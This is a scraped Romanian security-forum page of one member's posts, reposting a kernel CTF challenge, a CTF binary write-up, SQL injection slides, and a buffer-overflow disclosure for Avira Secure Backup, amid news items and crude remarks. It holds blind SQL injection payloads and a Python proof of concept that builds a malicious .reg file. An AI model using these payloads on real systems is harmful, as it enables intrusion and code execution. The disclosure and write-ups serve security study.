Nytro

Exista doar 2 tipuri de persoane (daca vreti, "hackeri negri") care fac bani: 1. Cei care fura date bancare (nicio legatura cu termenul "hacker") 2. Cei care scriu exploit-uri, le pun in exploitkit-uri si le vand pe blackmarket (adevaratii "hackeri negri") Restul sunt niste pule-blege care fac si ei cate un cacat pentru a supravietui de pe o zi pe alta. Multi de aici faceti chestii pe care ziceti ca le fac "hackerii negri". Cati ati facut peste 10.000 de euro astfel? Faceti o comparatie intre: 1. Anonymous care a obtinut acces la diverse rahaturi mai mari sau mai mici 2. Cei care participa la programe bug bounty Cati bani au facut anonimusii astfel? E doar un exemplu.

Doar de curiozitate, nu esti in Romania? Pentru ceilalti, in caz ca va plangeti de taxa: 1. Pentru organizare e nevoie de bani. Banii nu pica din cer. 2. Taxa e mica, mai ales pentru studenti. 3. Daca nu mai fumezi o saptamana ai banii de taxa. 4. Daca nu iesi 2 nopti la bere ai banii de taxa. 5. Daca nu iti cumperi telefon de 2000 RON ai bani de taxa. 6. Daca nu iti cumperi mouse de gaming ai bani de taxa. Pana la urma totul tine de voi. Daca chiar sunteti pasionati, veniti. Daca nu, ramaneti acasa, bagati un GTA/FIFA/CS si va aduceti aminte de acest topic cand imi puneti sosuri in shaorma.

Nu le mai dati COAILI v7.1 ca poate distrug RST astia mici...

Galaxy S3 era zilele trecute 1700 RON la emag si 1600 RON pe cel.ro. Azi cica era redus de la 2000 RON la 1500 RON. Practic, reducerile cred ca rareori trec de 10%. O sa imi iau si eu tigai si bormasina, ca tot romanu, nu imi trebuie, dar sunt la oferta... Sau cel putin asa zice toata lumea.

CSAW CTF 2013 Kernel Exploitation Challenge Table of Contents Introduction Understanding the Code Tracing the Vulnerable Code Path Leveraging the Vulnerability Circumventing Additional Obstacles Achieving Local Privilege Escalation Exploit Proof of Concept Bonus Points Introduction CSAW CTF 2013 was last weekend, and this year I was lucky enough to be named a judge for the competition. I decided to bring back the Linux kernel exploitation tradition of previous years and submitted the challenge “Brad Oberberg.” Four of the 15 teams successfully solved the challenge. Each team was presented with unprivileged access to a live VM running 32-bit Ubuntu 12.04.3 LTS. The vulnerable kernel module csaw.ko was loaded on each system, and successful exploitation would allow for local privilege escalation and subsequent reading of the flag. Source code to the kernel module was provided to each team, and may be viewed below (or downloaded here). Sursa: CSAW CTF 2013 Kernel Exploitation Challenge | Michael Coppola's Blog E cu rezolvari.

[h=1]Winamp shutting down after over 15 years[/h]By Jacob Kastrenakes on November 20, 2013 02:42 pm The famous media player Winamp will shut down next month, over 15 years after its initial release. Though Winamp eventually lost popularity, in the late '90s and early 2000s it was one of the go-to media players for listening to local music or radio streams. In 2002, Winamp's maker, Nullsoft, was acquired by AOL for over $80 million in stock, where it's remained in development until now. A Mac and an Android version were even released in recent years, though they never found the same fan base that its customizable Windows client did. No reason is given for Winamp's shutdown, but its popularity has certainly waned: simple, built-in audio solutions like iTunes are now ubiquitous across platforms, making Winamp a far more specialized app. In a retrospective published last year, Ars Technica reported that Winamp had existed for years on life support, but that those involved didn't believe it was dead yet. Now that it's nearly gone, those who want to relive old times should head over to Winamp's site before December 21st, when it'll no longer be available — its famous motto, of course, will always live on somewhere. Sursa: Winamp shutting down after over 15 years | The Verge Ce viata de cacat.

LiveLeak.com - 100.000 euro Hackers

Daca e cineva dornic (si este din Bucuresti) imi poate da PM. Ar fi de preferat cineva cu experienta.

[h=1]Google Engineering: Why does Google prefer the Java stack for its products instead of Python?[/h] Robert Love, Google Software Engineer and Manager on Web Search. Man, I cannot imagine writing let alone maintaining a large software stack in Python. We use C++, Go, and Java for production software systems, with Python employed for scripting, testing, and tooling. There are a bunch of reasons for the primacy of C++ and Java: Familiarity. Early Googlers were well-versed in C++. Performance. Java can be faster than Python; C++ can be faster than Java. Tooling. Tools for debugging, profiling, and so on are significantly better for Java than Python. Even C++ is easier to debug and understand in large systems. Concurrency. As you can imagine, Google systems are highly parallelized and many are highly threaded. Threading in Python is an unmitigated disaster. The global interpreter lock (GIL) is a giant pain in the ass. Lack of need for the prototyping prowess of Python. One commonly-cited strength of Python is that it is easier to rapidly prototype small systems in Python than Java and (to an even greater extent) C++. At Google, however, this benefit isn't all that appealing: We have a lot of powerful frameworks that make prototyping or extending existing systems easy. Folks tend to prototype by gluing a hack into an existing server rather than build an entirely new distributed system. Don't get me wrong, in the war of Perl versus Python, I come down on the side of Python. But I would never use it to build a production, scalable, mission critical, performant system—particularly one someone else may need to understand some day long in the future. Sursa: Robert Love's answer to Google Engineering: Why does Google prefer the Java stack for its products instead of Python? - Quora

Felicitari Alexandru, ti-ai facut numele, pozele si ce alte cacaturi mai ai pe Facebook publice pentru un cacat de referrer.

Anti - secimg.php ?

Si Realitatea pulii: http://www.realitatea.net/un-roman-a-inventat-masina-de-facut-bani-cum-stoarce-legal-averi-din-banci_1320382.html

Inception E-Zine #1 http://i.minus.com/iQ4CdoTgCXTr7.jpg #1 issue hacking e-zine <<Inception>>. Articles: 1.DLL Hijacking in antiviruses 2.About AV-checker 3.Miracle in a small back office 4.VX vs Commerce 5.Web security assessment planning 6.Polymorphic file virus BEETLE 7.The theory of building large p2p botnets 8.History of hacking 9.Self-rewriting executable code on LPC2388 10.Power in simplicity 11.Imported Code 12.Practical DNS-Amplification 13.Review of genetic algorithm for the example of guessing password by MD5-hash 14.Reflection: solution of "unconventional" tasks Members working on the e-zine: pr0mix Izg0y _sheva740 d3m Ar3s ALiEN Assault pest amdf FanOfGun rgb MZh XRipper KostaPC ProudPank valentin_p Versus71 aka HIMIKAT Attention: Folder <<sources>> detected AV. This not malware. It examples and source code for a better understanding of articles. They are completely safe for your PC. Download: EN: https://www.dropbox.com/s/9f1wrvpvzblcf25/inception_en.zip RU: https://www.dropbox.com/s/hm6b2pkj5ib8r38/inception_ru.zip Via: Inception E-Zine #1

Advanced SQL Injection Presented By: Joe McCray joe - learnsecurityonline.com http://twitter.com/j0emccray Joe McCray | LinkedIn Step 1: Tell customer you are 31337 security professional Customers only applied patches if it fixed something on the system It was common practice NOT to apply system updates that didn't fix a problem you were experiencing on a system (WTF ARE YOU DOING -YOU MIGHT BREAK SOMETHING!!!!!) Step 2: Scan customer network with ISS or Nessus if you were a renegade Customers didn't apply patches, and rarely even had firewalls and IDSs back then You know you only ran ISS because it had nice reports... Step 3: Break out your uber 31337 warez and 0wn it all!!!!! You only kept an exploit archive to save time (Hack.co.za was all you needed back then) If you could read the screen you could 0wn the network!!!!!!! Download: [URL]https://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf[/URL]

Money-making machine cashes in on currency trades By Mark Ward Technology correspondent, BBC News Dr Furtuna built a machine to read security codes on bank authentication devices A money-making machine that exploits rounding errors in currency exchanges in favour of bank customers has been built by a security researcher. If left to run at its top speed, the device could generate almost 70 euros (£58) a day by carrying out thousands of small transactions. The device was built to test the security of online banking systems. However, said experts, banks' anti-fraud systems would probably prevent the machine cashing in. Tiny trades The device was created by Romanian security researcher Dr Adrian Furtuna, who noticed what happened when certain amounts of Romanian leu were exchanged for euros. These transactions were rounded up in a customer's favour so they ended up with cash worth slightly more than they started with. "The trick is that users can choose the amounts that they want to exchange such that the rounding will be always done in their favour," Dr Furtuna told the BBC. The amounts involved are so small, 0.005 of a euro, that thousands of transactions are needed to generate a significant amount of money. Dr Furtuna, who works for KPMG Romania as a security analyst, set out to see if banks' online currency trading systems were vulnerable to large scale exploitation of this rounding error. The machine was needed because many banks use authentication gadgets to secure online transactions. These devices typically generate a short sequence of numbers that must be entered alongside other credentials when moving or exchanging money online. He automated the sequence by building a machine that could press buttons on the security device and read the code it generated as part of the authentication process. The response rate of the device limited the number of transactions that could be carried out, Dr Furtuna told the BBC. At most, he said, it could carry out 14,400 transactions per day. This means, at most, it could generate about 68 euros per day if left to run unchallenged. So far the device has been only proven to work in the lab, as the bank that asked Dr Furtuna to test its security did not give him permission to try it against its live online banking system. Swapping Romanian leu for euros let the machine cash in Separate research had shown that the online systems of at least five banks in Romania might be vulnerable to the money-machine attack, he said. Other banks in other nations might also be susceptible, he added. "Banks believe that nobody can do a high number of transactions in a feasible time since each transaction requires to be signed using the [authentication] device," he said. "By building this machine I proved that this assumption is wrong and transactions can be automated with or without an [authenticator]." Tod Beardsley, a security engineer at Rapid7, said such "salami slicing" attacks were well known, having been depicted in films such as Superman III, Hackers and Office Space. "Salami slicing attacks are usually illegal, since they usually add up to some kind of bank or tax fraud, or run afoul of anti-money laundering laws," he added. Many banks avoided falling victim to such attacks by imposing a minimum transaction size that removed the fractional error, said Mr Beardsley. Penetration tester Charlie Svensson, from security firm Sentor, said banks' anti-fraud mechanisms would probably spot and stop anyone trying to carry out thousands of tiny trades all day, every day. "I have the feeling that he would not be the first to do this, but banks tend to take notice when money goes missing," he said. "If there's one thing that banks worry about, it's money." Sursa: BBC News - Money-making machine cashes in on currency trades Nota: Tipu' e aproape la fel de bun ca mine

SQL Injection - Harder, Better, Faster, Stronger ## Retrieving ---- XXXX CASE (ASCII(substring((select @@version),1,1))&3) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC, CASE ((ASCII(substring((select @@version),1,1))&12)>>2) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC ## Retrieving XXXX ---- CASE ((ASCII(substring((select @@version),1,1))&48)>>4) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC, CASE ((ASCII(substring((select @@version),1,1))&192)>>6) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC Download: http://2011.ruxcon.org.au/assets/Presentations/2011-2/LNLJ-Harder_Better_Faster_Stronger_V1.0.pdf

WINdows Packet CAPture. E driverul care se instaleaza cu Wireshark folosit pentru sniffing. Deci instaleaza Winpcap sau Wireshark.

Firefox 25.0.1 - the security update that wasn't? by Paul Ducklin on November 16, 2013 Firefox just pushed out a minor browser update, bumping its version number from 25.0 to 25.0.1. I don't allow Firefox full autonomy over my updates, preferring to use the Check but let me choose option, so I was presented with a now-familiar popup to let me know what was on offer: A security and stability update for Firefox is available: Firefox 25.0.1. It is strongly recommended that you apply this update for Firefox as soon as possible. "There's not much point," I thought, "in using Let me choose if I don't do some reading first, even though I almost always decided to board the update train at once." The Release Notes reiterated the security-related importance of the update: FIXED - 25.0.1: New security fixes can be found here [link] And the Known Vulnerabilities page listed five critical, three high and two moderate security advisories: Eagle-eyed readers, however, will notice that these look very much like the bugs that were fixed in 25.0. In fact, they are the security fixes from 25.0, all of them listed as patched on 29 October 2013. A small mystery, to be sure, but not an encouraging one for users who like to read, learn and understand more about security patches before applying them. What happened? Perhaps there weren't actually any security fixes, but Mozilla's release boilerplate just assumed that there probably would be, and warned you anyway? Or perhaps there were security fixes, but Mozilla released the update and published all the boilerplate pages before updating the pages to which they link? ? Apple takes the latter course most of the time: you get a link to a generic security page (Apple's well-known landing page HT1222) that usually only gets updated later with the link you really want. Let's hope Mozilla hasn't copied Apple's often laboured and sluggish disclosure strategy. What to do? As you can probably guess, I just shrugged and boarded the train. The update was only 236KB, so there wasn't a lot to it, and everything seemed to work. Is this the way of the future? In a recent Chet Chat podcast, fellow Naked Security writer Chester Wisniewski asked that very same question, albeit in a slightly different way. Chet coined the term local cloud as a light-hearted way of describing applications that you install and run locally, but which might as well not have a version number because they just update automatically over the internet, on a schedule to suit themselves. In other words, local cloud applications are like cloud apps in the sense that "you get what you get," even though they load and run offline, and you don't need to run them in a browser. Google's Chrome is as good as there already; Apple's iOS and Mozilla's Firefox are getting pretty close. Android is as good as there, too, with the added confusion that different Google partners and providers push out their updates at wildly varying times. (Some Android devices never get the latest updates at all, sometimes leaving them vulnerable indefinitely, perhaps to enormous security holes). Sursa: Firefox 25.0.1 – the security update that wasn’t? | Naked Security

[h=1]NcN 2013 CTF australia bin write up[/h] In this post I will cover the first binary challenge of the No Con Name 2013 CTF driven by the Facebook security team. The binary is available here This binary challenge is based on a i386 elf file which prompts for a flag: borja@PanoramaBar $ file ./derp ./derp: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=b77361bfdab4b30a5ed258ee173fe306184a4438, not stripped borja@PanoramaBar $ ./derp Facebook CTF Enter flag: asdasdasdasd Sorry, that is not correct. borja@PanoramaBar $ The first look at the binary: borja@PanoramaBar $ gdb -q ./derp Reading symbols from /home/borja/Desktop/NcN2013-CTF/derp...(no debugging symbols found)...done. gdb-peda$ pdisass main Dump of assembler code for function main: 0x080482d4 <+0>: push ebp 0x080482d5 <+1>: mov ebp,esp 0x080482d7 <+3>: and esp,0xfffffff0 0x080482da <+6>: sub esp,0x20 0x080482dd <+9>: call 0x80483fa <print_header> 0x080482e2 <+14>: mov eax,ds:0x80d1088 0x080482e7 <+19>: mov DWORD PTR [esp],eax 0x080482ea <+22>: call 0x804ffa0 <malloc> 0x080482ef <+27>: mov DWORD PTR [esp+0x1c],eax 0x080482f3 <+31>: cmp DWORD PTR [esp+0x1c],0x0 0x080482f8 <+36>: jne 0x8048329 <main+85> 0x080482fa <+38>: mov eax,ds:0x80d14c4 0x080482ff <+43>: mov DWORD PTR [esp+0xc],eax 0x08048303 <+47>: mov DWORD PTR [esp+0x8],0x1b 0x0804830b <+55>: mov DWORD PTR [esp+0x4],0x1 0x08048313 <+63>: mov DWORD PTR [esp],0x80b2265 0x0804831a <+70>: call 0x8049130 <fwrite> 0x0804831f <+75>: mov eax,0x1 0x08048324 <+80>: jmp 0x80483f8 <main+292> 0x08048329 <+85>: mov eax,ds:0x80d1088 0x0804832e <+90>: mov DWORD PTR [esp+0x8],eax 0x08048332 <+94>: mov DWORD PTR [esp+0x4],0x0 0x0804833a <+102>: mov eax,DWORD PTR [esp+0x1c] 0x0804833e <+106>: mov DWORD PTR [esp],eax 0x08048341 <+109>: call 0x80481a0 0x08048346 <+114>: mov edx,DWORD PTR ds:0x80d14bc 0x0804834c <+120>: mov eax,ds:0x80d1088 0x08048351 <+125>: sub eax,0x1 0x08048354 <+128>: mov DWORD PTR [esp+0x8],edx 0x08048358 <+132>: mov DWORD PTR [esp+0x4],eax 0x0804835c <+136>: mov eax,DWORD PTR [esp+0x1c] 0x08048360 <+140>: mov DWORD PTR [esp],eax 0x08048363 <+143>: call 0x8048fc0 <fgets> 0x08048368 <+148>: test eax,eax 0x0804836a <+150>: jne 0x80483a4 <main+208> 0x0804836c <+152>: mov eax,ds:0x80d14c4 0x08048371 <+157>: mov DWORD PTR [esp+0xc],eax 0x08048375 <+161>: mov DWORD PTR [esp+0x8],0x1b 0x0804837d <+169>: mov DWORD PTR [esp+0x4],0x1 0x08048385 <+177>: mov DWORD PTR [esp],0x80b2281 0x0804838c <+184>: call 0x8049130 <fwrite> 0x08048391 <+189>: mov eax,DWORD PTR [esp+0x1c] 0x08048395 <+193>: mov DWORD PTR [esp],eax 0x08048398 <+196>: call 0x804fee0 <free> 0x0804839d <+201>: mov eax,0x2 0x080483a2 <+206>: jmp 0x80483f8 <main+292> 0x080483a4 <+208>: mov eax,ds:0x80d1088 0x080483a9 <+213>: sub eax,0x2 0x080483ac <+216>: mov DWORD PTR [esp+0x4],eax 0x080483b0 <+220>: mov eax,DWORD PTR [esp+0x1c] 0x080483b4 <+224>: mov DWORD PTR [esp],eax 0x080483b7 <+227>: call 0x804841a <check_buffer> 0x080483bc <+232>: test eax,eax 0x080483be <+234>: jne 0x80483e7 <main+275> 0x080483c0 <+236>: mov eax,ds:0x80d14c4 0x080483c5 <+241>: mov DWORD PTR [esp+0xc],eax 0x080483c9 <+245>: mov DWORD PTR [esp+0x8],0x1c 0x080483d1 <+253>: mov DWORD PTR [esp+0x4],0x1 0x080483d9 <+261>: mov DWORD PTR [esp],0x80b229d 0x080483e0 <+268>: call 0x8049130 <fwrite> 0x080483e5 <+273>: jmp 0x80483f3 <main+287> 0x080483e7 <+275>: mov DWORD PTR [esp],0x80b22ba 0x080483ee <+282>: call 0x8049430 <puts> 0x080483f3 <+287>: mov eax,0x0 0x080483f8 <+292>: leave 0x080483f9 <+293>: ret End of assembler dump. gdb-peda$ The call to the function that will check the input buffer is located at 0x080483b7 0x080483b7 <+227>: call 0x804841a <check_buffer>Let’s what the function check_buffer does: gdb-peda$ pdisass check_buffer Dump of assembler code for function check_buffer: 0x0804841a <+0>: push ebp 0x0804841b <+1>: mov ebp,esp 0x0804841d <+3>: sub esp,0x10 0x08048420 <+6>: mov BYTE PTR [ebp-0x5],0x0 0x08048424 <+10>: mov BYTE PTR [ebp-0x6],0x0 0x08048428 <+14>: mov BYTE PTR [ebp-0x7],0x0 0x0804842c <+18>: mov DWORD PTR [ebp-0x4],0x0 0x08048433 <+25>: mov DWORD PTR [ebp-0xc],0xcd000000 0x0804843a <+32>: jmp 0x804849c <check_buffer+130> 0x0804843c <+34>: mov eax,DWORD PTR [ebp-0xc] 0x0804843f <+37>: shr eax,0x18 0x08048442 <+40>: mov BYTE PTR [ebp-0x7],al 0x08048445 <+43>: movzx eax,BYTE PTR [ebp-0x7] 0x08048449 <+47>: and eax,0xf 0x0804844c <+50>: mov BYTE PTR [ebp-0x5],al 0x0804844f <+53>: movzx eax,BYTE PTR [ebp-0x7] 0x08048453 <+57>: and eax,0xfffffff0 0x08048456 <+60>: mov BYTE PTR [ebp-0x6],al 0x08048459 <+63>: movzx eax,BYTE PTR [ebp-0x6] 0x0804845d <+67>: mov edx,eax 0x0804845f <+69>: shr dl,0x4 0x08048462 <+72>: movzx eax,BYTE PTR [ebp-0x5] 0x08048466 <+76>: shl eax,0x4 0x08048469 <+79>: add eax,edx 0x0804846b <+81>: mov BYTE PTR [ebp-0x7],al 0x0804846e <+84>: mov edx,DWORD PTR ds:0x80d1090 0x08048474 <+90>: mov eax,DWORD PTR [ebp-0x4] 0x08048477 <+93>: add eax,edx 0x08048479 <+95>: movzx edx,BYTE PTR [eax] 0x0804847c <+98>: mov eax,DWORD PTR [ebp-0x4] 0x0804847f <+101>: mov ecx,DWORD PTR [ebp+0x8] 0x08048482 <+104>: add eax,ecx 0x08048484 <+106>: movzx ecx,BYTE PTR [eax] 0x08048487 <+109>: movzx eax,BYTE PTR [ebp-0x7] 0x0804848b <+113>: xor eax,ecx 0x0804848d <+115>: cmp dl,al 0x0804848f <+117>: je 0x8048498 <check_buffer+126> 0x08048491 <+119>: mov eax,0x0 0x08048496 <+124>: jmp 0x80484a9 <check_buffer+143> 0x08048498 <+126>: add DWORD PTR [ebp-0x4],0x1 0x0804849c <+130>: mov eax,DWORD PTR [ebp-0x4] 0x0804849f <+133>: cmp eax,DWORD PTR [ebp+0xc] 0x080484a2 <+136>: jb 0x804843c <check_buffer+34> 0x080484a4 <+138>: mov eax,0x1 0x080484a9 <+143>: leave 0x080484aa <+144>: ret End of assembler dump. gdb-peda$ First, the function will set the local variables after the function prologue at 0×08048420. After that It jumps to 0x080484a2 to finally jump again to 0x804843c which is when the important part takes place: 0x0804841a <+0>: push ebp 0x0804841b <+1>: mov ebp,esp 0x0804841d <+3>: sub esp,0x10 0x08048420 <+6>: mov BYTE PTR [ebp-0x5],0x0 0x08048424 <+10>: mov BYTE PTR [ebp-0x6],0x0 0x08048428 <+14>: mov BYTE PTR [ebp-0x7],0x0 0x0804842c <+18>: mov DWORD PTR [ebp-0x4],0x0 0x08048433 <+25>: mov DWORD PTR [ebp-0xc],0xcd000000 0x0804843a <+32>: jmp 0x804849c <check_buffer+130> 0x0804849c <+130>: mov eax,DWORD PTR [ebp-0x4] 0x0804849f <+133>: cmp eax,DWORD PTR [ebp+0xc] 0x080484a2 <+136>: jb 0x804843c <check_buffer+34> Here, we can se some calculations over the registers eax,ecx and edx 0x0804843c <+34>: mov eax,DWORD PTR [ebp-0xc] 0x0804843f <+37>: shr eax,0x18 0x08048442 <+40>: mov BYTE PTR [ebp-0x7],al 0x08048445 <+43>: movzx eax,BYTE PTR [ebp-0x7] 0x08048449 <+47>: and eax,0xf 0x0804844c <+50>: mov BYTE PTR [ebp-0x5],al 0x0804844f <+53>: movzx eax,BYTE PTR [ebp-0x7] 0x08048453 <+57>: and eax,0xfffffff0 0x08048456 <+60>: mov BYTE PTR [ebp-0x6],al 0x08048459 <+63>: movzx eax,BYTE PTR [ebp-0x6] 0x0804845d <+67>: mov edx,eax 0x0804845f <+69>: shr dl,0x4 0x08048462 <+72>: movzx eax,BYTE PTR [ebp-0x5] 0x08048466 <+76>: shl eax,0x4 0x08048469 <+79>: add eax,edx 0x0804846b <+81>: mov BYTE PTR [ebp-0x7],al 0x0804846e <+84>: mov edx,DWORD PTR ds:0x80d1090 0x08048474 <+90>: mov eax,DWORD PTR [ebp-0x4] 0x08048477 <+93>: add eax,edx 0x08048479 <+95>: movzx edx,BYTE PTR [eax] 0x0804847c <+98>: mov eax,DWORD PTR [ebp-0x4] 0x0804847f <+101>: mov ecx,DWORD PTR [ebp+0x8] 0x08048482 <+104>: add eax,ecx 0x08048484 <+106>: movzx ecx,BYTE PTR [eax] 0x08048487 <+109>: movzx eax,BYTE PTR [ebp-0x7] 0x0804848b <+113>: xor eax,ecx 0x0804848d <+115>: cmp dl,al 0x0804848f <+117>: je 0x8048498 <check_buffer+126> Here follows the most important part of this dissasembled. The register ecx will contain the characters of the user’s input string. This value will get xored with eax and then compared to edx. If the input caracted contained in ecx equals to xor(eax,edx) the function will jump to the begining of the algorithm to repeat this check for every character of the string 0x0804848b <+113>: xor eax,ecx 0x0804848d <+115>: cmp dl,al 0x0804848f <+117>: je 0x8048498 <check_buffer+126> To calculate to correct value for the input string, It is needed to calculate the value of xor(eax,edx) every iteration. This can be easily achieved with the following gdb script: # 0x804848b <check_buffer+113>: xor eax,ecx # 0x804848d <check_buffer+115>: cmp dl,al # 0x804848f <check_buffer+117>: je 0x8048498 <check_buffer+126> break *0x804848b commands printf "%c", $edx ^ $eax continue end break *0x804848d commands set $eax = $edx continue end run quit The execution will look like the followin excerpt: borja@PanoramaBar $ echo | gdb -q -x au_derp.gdb ./au_derp Reading symbols from /home/borja/Desktop/NcN2013-CTF/australia/au_derp...(no debugging symbols found)...done. Breakpoint 1 at 0x804848b Breakpoint 2 at 0x804848d Facebook CTF 74c86bf89646425f647fcf7643af15f251b186bf58a6d5dc7eb8bf9cfc9d04cdEnter flag: Winner! Post your flag. [Inferior 1 (process 19655) exited normally] Warning: not running or target is remote Challenge solved! Sursa: NcN 2013 CTF australia bin write up | non-sleep thinking

CVE-2013-6356: Avira Secure Backup v1.0.0.1 Buffer Overflow – Anatomy of a Vulnerability Hello Followers, Avira is one of the leading Anti-Virus vendors and also the biggest one in Germany. Security is their daily business and they’ve done a quite nice job in hardening their products. But even the toughest software may be broken sometimes . So, this time I’d like to present a common vulnerability with a really interesting (and uncommon) root cause. Quoted from my official Full-Disclosure post: A buffer overflow vulnerability has been identified in Avira Secure Backup v1.0.0.1 Build 3616. The application loads the values of the Registry Keys “AutoUpdateDownloadFilename” and “AutoUpdateProgressFilename” from “HKEY_CURRENT_USER\Software\Avira Secure Backup” on startup but does not properly validate the length of the fetched values before using them in the further application context, which leads to a buffer overflow condition with possible persistent code execution. The application queries the values via a RegQueryValueExW call and a fixed buffer pointer (lpData) and a fixed buffer size pointer (lpcbData). If the input string size is greater than the predefined size, the application uses a second RegQueryValueExW call with the new buffer size set to the length of the input string, but reuses the original buffer pointer (lpData), which has not been resized. This results in overwriting memory space inlcuding SEH – records. An attacker needs to force the victim to import an arbitrary .reg file in order to exploit the vulnerability. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in a denial-of-service condition. The attack scenario is persistent, because the code is executed as long as the manipulated values are loaded into the Registry. Crashing the application! To exploit this vulnerability, the following script creates an arbitrary .reg file, which needs to be imported into the target registry. #!/usr/bin/pythonfile="poc.reg" junk1="\xCC" * 1240 poc="Windows Registry Editor Version 5.00\n\n" poc=poc + "[HKEY_CURRENT_USER\Software\Avira Secure Backup]\n" poc=poc + "\"AutoUpdateProgressFilename\"=\"" + junk1 + "\"" try: print " [*] Creating exploit file...\n"; writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print " [*] File successfully created!"; except: print "[!] Error while creating file!"; Starting the application results in EIP control: via overwritten SEH records: Sounds like a boring strcpy() overflow ? After importing the arbitrary .reg file created by the Python script, the Call stack of the application looks like the following on crash-time: The last entry clearly shows that a return address has been overwritten by the PoC code indicating that the application flow might be controlled. The last call is a ntdll.memmove triggered somewhere from within the function at 0x0043F0D2. The complete vulnerable code part located at this address: 0043F0D2 /$ 55 PUSH EBP 0043F0D3 |. 8BEC MOV EBP,ESP 0043F0D5 |. 83EC 10 SUB ESP,10 0043F0D8 |. 53 PUSH EBX 0043F0D9 |. 56 PUSH ESI 0043F0DA |. 8B35 14704E00 MOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>; ADVAPI32.RegOpenKeyExW 0043F0E0 |. 57 PUSH EDI 0043F0E1 |. 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 0043F0E4 |. 50 PUSH EAX ; /pHandle 0043F0E5 |. 68 19000200 PUSH 20019 ; |Access 0043F0EA |. 33DB XOR EBX,EBX ; | 0043F0EC |. 53 PUSH EBX ; |Reserved => 0 0043F0ED |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; |Subkey 0043F0F0 |. 885D FF MOV BYTE PTR SS:[EBP-1],BL ; | 0043F0F3 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hKey 0043F0F6 |. C745 F4 200800>MOV DWORD PTR SS:[EBP-C],820 ; | 0043F0FD |. FFD6 CALL ESI ; \RegOpenKeyExW 0043F0FF |. 8B3D 10704E00 MOV EDI,DWORD PTR DS:[<&ADVAPI32.RegQuer>; ADVAPI32.RegQueryValueExW 0043F105 |. 85C0 TEST EAX,EAX 0043F107 |. 75 2A JNZ SHORT Avira_Se.0043F133 0043F109 |. 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] 0043F10C |. 50 PUSH EAX ; /pBufSize 0043F10D |. FF75 14 PUSH DWORD PTR SS:[EBP+14] ; |Buffer 0043F110 |. 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] ; | 0043F113 |. 50 PUSH EAX ; |pValueType 0043F114 |. 53 PUSH EBX ; |Reserved => NULL 0043F115 |. FF75 10 PUSH DWORD PTR SS:[EBP+10] ; |ValueName 0043F118 |. FF75 F8 PUSH DWORD PTR SS:[EBP-8] ; |hKey 0043F11B |. FFD7 CALL EDI ; \RegQueryValueExW 0043F11D |. 85C0 TEST EAX,EAX 0043F11F |. 75 04 JNZ SHORT Avira_Se.0043F125 0043F121 |. C645 FF 01 MOV BYTE PTR SS:[EBP-1],1 0043F125 |> FF75 F8 PUSH DWORD PTR SS:[EBP-8] ; /hKey 0043F128 |. FF15 0C704E00 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey 0043F12E |. 385D FF CMP BYTE PTR SS:[EBP-1],BL 0043F131 |. 75 3B JNZ SHORT Avira_Se.0043F16E 0043F133 |> 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 0043F136 |. 50 PUSH EAX 0043F137 |. 68 19010200 PUSH 20119 0043F13C |. 53 PUSH EBX 0043F13D |. FF75 0C PUSH DWORD PTR SS:[EBP+C] 0043F140 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] 0043F143 |. FFD6 CALL ESI 0043F145 |. 85C0 TEST EAX,EAX 0043F147 |. 75 25 JNZ SHORT Avira_Se.0043F16E 0043F149 |. 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] 0043F14C |. 50 PUSH EAX 0043F14D |. FF75 14 PUSH DWORD PTR SS:[EBP+14] 0043F150 |. 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 0043F153 |. 50 PUSH EAX 0043F154 |. 53 PUSH EBX 0043F155 |. FF75 10 PUSH DWORD PTR SS:[EBP+10] 0043F158 |. FF75 F8 PUSH DWORD PTR SS:[EBP-8] 0043F15B |. FFD7 CALL EDI 0043F15D |. 85C0 TEST EAX,EAX 0043F15F |. 75 04 JNZ SHORT Avira_Se.0043F165 0043F161 |. C645 FF 01 MOV BYTE PTR SS:[EBP-1],1 0043F165 |> FF75 F8 PUSH DWORD PTR SS:[EBP-8] ; /hKey 0043F168 |. FF15 0C704E00 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey 0043F16E |> 33C0 XOR EAX,EAX 0043F170 |. 385D FF CMP BYTE PTR SS:[EBP-1],BL 0043F173 |. 5F POP EDI 0043F174 |. 5E POP ESI 0043F175 |. 0F95C0 SETNE AL 0043F178 |. 5B POP EBX 0043F179 |. C9 LEAVE 0043F17A \. C3 RETN Looks like there is no common strcpy() … Hunting the Bug! The vulnerable code part needs to be divided into different parts: 0043F0D2 /$ 55 PUSH EBP 0043F0D3 |. 8BEC MOV EBP,ESP 0043F0D5 |. 83EC 10 SUB ESP,10 0043F0D8 |. 53 PUSH EBX 0043F0D9 |. 56 PUSH ESI 0043F0DA |. 8B35 14704E00 MOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>; ADVAPI32.RegOpenKeyExW 0043F0E0 |. 57 PUSH EDI 0043F0E1 |. 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 0043F0E4 |. 50 PUSH EAX ; /pHandle 0043F0E5 |. 68 19000200 PUSH 20019 ; |Access 0043F0EA |. 33DB XOR EBX,EBX ; | 0043F0EC |. 53 PUSH EBX ; |Reserved => 0 0043F0ED |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; |Subkey 0043F0F0 |. 885D FF MOV BYTE PTR SS:[EBP-1],BL ; | 0043F0F3 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hKey 0043F0F6 |. C745 F4 200800>MOV DWORD PTR SS:[EBP-C],820 